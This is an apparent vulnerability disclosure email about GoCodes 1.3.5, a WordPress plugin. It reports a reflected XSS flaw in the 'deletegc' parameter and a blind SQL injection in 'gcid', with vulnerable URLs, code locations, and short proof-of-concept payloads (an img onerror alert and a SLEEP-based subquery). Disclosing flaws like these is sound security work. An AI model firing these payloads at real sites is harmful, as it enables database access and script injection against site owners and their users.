Subject: SQL injection and Cross-Site Scripting (XSS) in GoCodes 1.3.5
Date: Tue, 25 Aug 2015 14:46:49 +0200

Hello,

Plugin: GoCodes 1.3.5 https://wordpress.org/plugins/gocodes/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated users (like editors) can inject html/js code (there is no CSRF protection!).

Method: GET
Url: http://localhost/wp-admin/tools.php?page=gocodes%2Fgocodes.php&deletegc=[xss]
Vulnerable parameters: deletegc

Example PHP callstack:
wsc_gocodes_managemenu   [/gocodes/menus.php:28]

Verification:
http://localhost/wp-admin/tools.php?page=gocodes%2Fgocodes.php&deletegc=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


2. Blind SQL injection 

Authenticated users (like editors) can execute arbitrary SQL commands (there is no CSRF protection!).

Method: GET
Url: http://localhost/wp-admin/tools.php?page=gocodes%2Fgocodes.php&gcresetcountconf=yes&gcid=1
Vulnerable parameter: gcid

Example PHP callstack:
wsc_gocodes_managemenu   [/gocodes/menus.php:79]
fake_wpdb::query

Verification:
http://localhost/wp-admin/tools.php?page=gocodes%2Fgocodes.php&gcresetcountconf=yes&gcid=1%20OR%20(SELECT%20*%20FROM(SELECT%20SLEEP(5))XXX)

There are similar SQL injections with the same parameter:
/gocodes/menus.php:63
/gocodes/menus.php:158

--
Regards,
Marcin Probola,